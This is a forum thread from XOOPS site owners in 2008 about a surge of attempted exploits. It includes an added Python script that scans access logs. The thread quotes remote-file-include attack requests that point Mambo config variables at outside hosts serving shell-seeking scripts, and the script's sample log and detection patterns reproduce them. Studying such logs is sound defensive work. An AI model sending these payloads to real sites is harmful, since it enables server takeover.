xoops forums

peterr (Just can't stay away; Posts: 518; Since: 2004/8/5 9)
Posted on: 2008/4/16 11:53
#1

Increase in attempted exploits

Just wondering if any other XOOPS users are noticing a significant increase in the number of exploits on their site?

The type of activity that has increased is of this nature:

Quote:

www.example.com/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.tugzip.com/files/xpl/test.txt???

www.example.com/modules/xhld0//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.nameserver11.net/billing2/include/html/test.txt?

www.example.com//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.nameserver11.net/billing2/include/html/test.txt?

www.example.com/administrator/ ... ?mosConfig_live_site=http://www.nameserver11.net/billing2/include/html/test.txt?

www.example.com/modules/xhld0/ ... ?mosConfig_live_site=http://www.nameserver11.net/billing2/include/html/test.txt?

www.example.com/modules/xhld0/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.tugzip.com/files/xpl/test.txt???


I have checked the site at http://www.milw0rm.com/, and searched for 'XOOPS', to see if there are any new vulnerabilities, but cannot see anything significant.

The number of attempted exploits has gone from about 3 or 4 a day to 90 or so, quite a rise.

Maybe it's just a case of more people with nothing better to do ??
NO to the Microsoft Office format as an ISO standard.
Sign the petition

Tobias (Not too shy to talk; Posts: 172; Since: 2005/9/13)
Posted on: 2008/4/17 5:55
#2

Re: Increase in attempted exploits

Somebody is clearly trying to break in. I hope you have your XOOPS Protector module up and running. Many of these hits may be random, but they clearly try to deliver a payload, and you can actually see it if you call up the txt files the hacker wants to execute on your server. Those are scripts that sniff out vulnerabilities in the server's setup and try to get shell access.

Where are these log entries from, anyway? They look funky.

If you have a lot of time to spare, you can contact the webhosts from which these scripts are served and tell them that some of their users are making nonsense. But then, that's a fight against windmills. You can also send a sample to your own webhost and ask them for guidance, and to make sure that the servers are configured correctly.

*edit* But probably, you don't want to have anything to do with those tugzip folks. So forget the suggestion with contacting them. In any case, make sure you don't use Internet Explorer if you want to look around what's going on there.

Lloyd (Just popping in; Posts: 43; Since: 2006/7/4 1)
Posted on: 2008/4/17 6:49
#3

Re: Increase in attempted exploits

Contact the IP block owners.....not the offending website owners.

nameserver11.net = 65.254.49.77
This IP block is owned by Global Net Access, LLC,
Address: 1100 White St SW
City: Atlanta
StateProv: GA
PostalCode: 30310
Country: US
NetRange: 65.254.32.0 - 65.254.63.255
contact: abuse @ gnax.net, send them as much info as you can.


tugzip.com = 194.150.222.75
Country:Sweden
NetRange: 194.150.222.0 - 194.150.223.255
contact: abuse @ sajthotellet.com

peterr (Just can't stay away; Posts: 518; Since: 2004/8/5 9)
Posted on: 2008/4/17 6:57
#4

Re: Increase in attempted exploits

Quote:

Somebody is clearly trying to break in. I hope you have your XOOPS Protector module up and running. Many of these hits may be random, but they clearly try to deliver a payload, and you can actually see it if you call up the txt files the hacker wants to execute on your server. Those are scripts that sniff out vulnerabilities in the server's setup and try to get shell access.


Yes, I use Protector, I wouldn't use XOOPS without it. Yep, lots of the text files have 'passthru' and other commands in them, clearly malicious activity, which I'd expect, but it has risen so much, I'm wondering if there is a new XOOPS exploit that people know about, and they are giving the site a hammering.

Fortunately, the server is configured to return a 403 on most of these, or a 404.

Quite a lot of these entries have 'database.php' in them, that's why I was wondering if there is a new exploit, but as yet unknown to a lot of people. Found one at http://www.milw0rm.com/exploits/2623, but it is dated Oct 2006, a long time ago.

Quote:

Where are these log entries from, anyway? They look funky.


Coming from many different IP addresses. Hmm, look funky, not too sure what you mean there? Oh, the domain name has been changed, for obvious security reasons, we don't want people actually trying it.

Quote:

If you have a lot of time to spare, you can contact the webhosts from which these scripts are served and tell them that some of their users are making nonsense. But then, that's a fight against windmills.


In the past, I sometimes used to actually look up the IP and contact the person/s concerned, and CC in their ISP, but that was when there were only a few a day. Much of that contact resulted in either the person having their account suspended or terminated, or other action. Most hosts appreciated being contacted. Also, as you mention, contact the 'source' from where the scripts are served, yes, did that in the past, in a lot of cases, it resulted in the file being removed. But some sort of automated system would be better.

Quote:

You can also send a sample to your own webhost and ask them for guidance, and to make sure that the servers are configured correctly.


The host I use has it all tied down fairly well, but the 403 messages have now changed to 404's, so I'll ask why the server change.

Quote:

*edit* But probably, you don't want to have anything to do with those tugzip folks. So forget the suggestion with contacting them. In any case, make sure you don't use Internet Explorer if you want to look around what's going on there.


Yes, I don't use IE, Firefox for me.

jobrazo (Just popping in; Posts: 46; Since: 2007/9/26)
Posted on: 2008/4/17 10:53
#5

Re: Increase in attempted exploits

I also have a major increase of exploit attempts the past few weeks.
Targeted module is wiwimod; they're looking for the SPAW editor, which is removed because of known exploits.

Tobias (Not too shy to talk; Posts: 172; Since: 2005/9/13)
Posted on: 2008/4/17 16:54
#6

Re: Increase in attempted exploits

Quote:

Quite a lot of these entries have 'database.php' in them, that's why I was wondering if there is a new exploit, but as yet unknown to a lot of people. Found one at http://www.milw0rm.com/exploits/2623, but it is dated Oct 2006, a long time ago.

My XOOPS installation has exactly one database.php which sits at class/database. If your attackers try to find a database.php all over the place, then that's probably just a crapshoot. Perhaps some modules also have a database.php.

In any case, if there's a pattern and you want to make sure, you can probably just block all requests containing the string database.php in your htaccess file. I can't imagine any reason why a script by that name should be legitimately called from the outside.


Quote:

Yes, I don't use IE, Firefox for me.


Just saying because that tugzip site is hacked and may serve up malware. At the time of writing this, perhaps they clean it up soon.

peterr (Just can't stay away; Posts: 518; Since: 2004/8/5 9)
Posted on: 2008/4/24 0:36
#7

Re: Increase in attempted exploits

There is one pattern of a lot of exploits, and it is this as part of the uri

Quote:

.....mosConfig_absolute_path=.....


Apparently, that is related to Mambo exploits, so I did a google search on the site, and looked for 'mambo', and sure enough, there is one page that has Mambo described in it.

So, no doubt the huge increase in exploits is because the attempted exploiters think the website is running Mambo.

I'll remove that page, and then see if there is a decrease; it may take several weeks before the Google cache is updated of course.
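A defender's triage script for the request patterns discussed in this thread, added here as an example; it is not code from the thread, from XOOPS or from the Protector module. It tags each access-log entry with the indicators the posts describe (a remote URL in mosConfig_absolute_path or mosConfig_live_site, the _REQUEST/GLOBALS overwrites in post #1, the database.php probes from post #6, and the wiwimod/SPAW editor probes from post #5) and tallies them per day and per response status, so the jump from a few hits a day to ninety, and whether the server answered 403 or 404, can be read off the log. The log lines, IP addresses and the attacker.example host are constructed; the list of superglobal names goes beyond the two that appear on the page.

```python
"""Tally remote-file-include and probe patterns in an Apache-style access log.

Added example for the XOOPS forum thread above; not XOOPS or Protector code.
All log lines below are constructed sample data.
"""
import re
from collections import Counter
from urllib.parse import parse_qsl, unquote

# Combined-format prefix: client IP, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Mambo/Joomla config variables abused by the requests quoted in post #1.
# An absolute URL in them means the attacker wants a remote file included.
RFI_PARAMS = {"mosconfig_absolute_path", "mosconfig_live_site"}
REMOTE_SCHEME = re.compile(r"^(https?|ftps?)://", re.IGNORECASE)

# PHP superglobals that register_globals-style code could be tricked into
# overwriting from the query string (assumption: page shows only the first two).
SUPERGLOBALS = {"_request", "globals", "_get", "_post", "_cookie", "_server"}

# Constructed sample log; IPs are documentation ranges, host is a placeholder.
SAMPLE_LOG = """\
203.0.113.5 - - [16/Apr/2008:11:02:10 +0000] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://attacker.example/test.txt??? HTTP/1.1" 403 212 "-" "libwww-perl/5.805"
203.0.113.9 - - [16/Apr/2008:11:05:44 +0000] "GET /modules/xhld0//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://attacker.example/test.txt? HTTP/1.1" 404 0 "-" "libwww-perl/5.805"
198.51.100.7 - - [17/Apr/2008:06:40:01 +0000] "GET /administrator/index.php?mosConfig_live_site=http://attacker.example/test.txt? HTTP/1.1" 403 212 "-" "Mozilla/4.0"
198.51.100.8 - - [17/Apr/2008:06:41:30 +0000] "GET /modules/wiwimod/spaw/spaw_control.class.php HTTP/1.0" 404 0 "-" "Mozilla/4.0"
198.51.100.9 - - [17/Apr/2008:06:42:12 +0000] "GET /modules/somemod/class/database.php HTTP/1.0" 403 212 "-" "Mozilla/4.0"
192.0.2.44 - - [17/Apr/2008:07:00:00 +0000] "GET /modules/news/index.php?storytopic=3 HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux) Firefox/2.0"
"""


def classify(target):
    """Return a sorted list of indicator names for one request target (path?query)."""
    path, _, query = target.partition("?")      # first '?' only; later '?' stay in the value
    path = unquote(path).lower()
    hits = set()
    # keep_blank_values so "_REQUEST=&GLOBALS=" is still seen as two parameters
    for key, value in parse_qsl(query, keep_blank_values=True):
        base = key.lower().split("[", 1)[0]     # "_REQUEST[option]" -> "_request"
        if base in RFI_PARAMS and REMOTE_SCHEME.match(value.strip()):
            hits.add("remote-include")
        if base in SUPERGLOBALS:
            hits.add("superglobal-injection")
    if path.endswith("/database.php"):
        hits.add("database.php-probe")
    if "/spaw" in path:
        hits.add("spaw-editor-probe")
    return sorted(hits)


def summarize(lines):
    """Parse log lines; return (hits per day, hits per status, flagged entries)."""
    per_day, per_status, flagged = Counter(), Counter(), []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                            # not a request line we understand
        hits = classify(m["target"])
        if not hits:
            continue
        day = m["ts"].split(":", 1)[0]          # "17/Apr/2008:06:40:01 +0000" -> "17/Apr/2008"
        per_day[day] += 1
        per_status[m["status"]] += 1
        flagged.append((m["ip"], m["target"], hits))
    return per_day, per_status, flagged


if __name__ == "__main__":
    days, statuses, entries = summarize(SAMPLE_LOG.splitlines())
    for day, n in sorted(days.items()):
        print(f"{day}: {n} flagged requests")
    print("by status:", dict(statuses))
    for ip, target, hits in entries:
        print(ip, ",".join(hits), target[:60])
```

Feed it the real access log with `summarize(open("access.log").readlines())`; a day whose count jumps from single digits to dozens is the spike described in post #1, and any flagged entry answered with 200 rather than 403/404 is the one worth investigating first.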

Tobias (Not too shy to talk; Posts: 172; Since: 2005/9/13)
Posted on: 2008/4/24 6:01
#8

Re: Increase in attempted exploits

Quote:
Just saying because that tugzip site is hacked and may serve up malware. At the time of writing this, perhaps they clean it up soon.

It's cleaned up, just for the record.